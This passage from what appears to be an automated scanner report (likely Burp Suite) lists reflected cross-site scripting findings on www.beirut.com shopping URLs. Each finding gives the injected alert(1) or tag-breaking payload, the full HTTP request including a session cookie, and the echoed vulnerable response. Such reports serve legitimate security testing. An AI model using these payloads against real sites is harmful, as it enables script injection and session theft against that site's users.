Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:24:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping3c433"><a>8c38f7750ca">
...[SNIP]...

4.1005. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f304e'-alert(1)-'8a657e66075 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingsf304e'-alert(1)-'8a657e66075/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishingsf304e'-alert(1)-'8a657e66075/4120758082/Furniture-Rentals/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1006. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 741f6<script>alert(1)</script>27eeededa1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings741f6<script>alert(1)</script>27eeededa1b/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings741f6<script>alert(1)</script>27eeededa1b <a href="#" id="backlink">
...[SNIP]...

4.1007. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 398bc'-alert(1)-'a711843de8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082398bc'-alert(1)-'a711843de8f/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082398bc'-alert(1)-'a711843de8f/Furniture-Rentals/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1008. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1118'-alert(1)-'292a7a8d67f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture-Rentalsf1118'-alert(1)-'292a7a8d67f/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:47:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Furniture-Rentalsf1118'-alert(1)-'292a7a8d67f/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1009. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abcbe'-alert(1)-'b38da2feaa5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9abcbe'-alert(1)-'b38da2feaa5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9abcbe'-alert(1)-'b38da2feaa5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1010. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36118'-alert(1)-'3205e213c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping36118'-alert(1)-'3205e213c6/Home-Furnishings/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping36118'-alert(1)-'3205e213c6/Home-Furnishings/4120758082/Furniture/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1011. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d36"><a>85eddb2ca86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingf8d36"><a>85eddb2ca86/Home-Furnishings/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:13:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingf8d36"><a>85eddb2ca86">
...[SNIP]...

4.1012. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91ec5<script>alert(1)</script>adf64f49404 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings91ec5<script>alert(1)</script>adf64f49404/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings91ec5<script>alert(1)</script>adf64f49404 <a href="#" id="backlink">
...[SNIP]...

4.1013. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5860d'-alert(1)-'963cfe6c8a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings5860d'-alert(1)-'963cfe6c8a9/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:27:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings5860d'-alert(1)-'963cfe6c8a9/4120758082/Furniture/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1014. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e30a'-alert(1)-'5c94fb05aa8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/41207580829e30a'-alert(1)-'5c94fb05aa8/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:33:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/41207580829e30a'-alert(1)-'5c94fb05aa8/Furniture/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1015. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac6a1'-alert(1)-'d4a79eb1946 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Furnitureac6a1'-alert(1)-'d4a79eb1946/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:38:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Furnitureac6a1'-alert(1)-'d4a79eb1946/19';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1016. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a4c8'-alert(1)-'183345e8a7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture/195a4c8'-alert(1)-'183345e8a7c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:43:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings/4120758082/Furniture/195a4c8'-alert(1)-'183345e8a7c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1017. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b329"><a>52e80b7a0fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping3b329"><a>52e80b7a0fe/Home-Furnishings/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
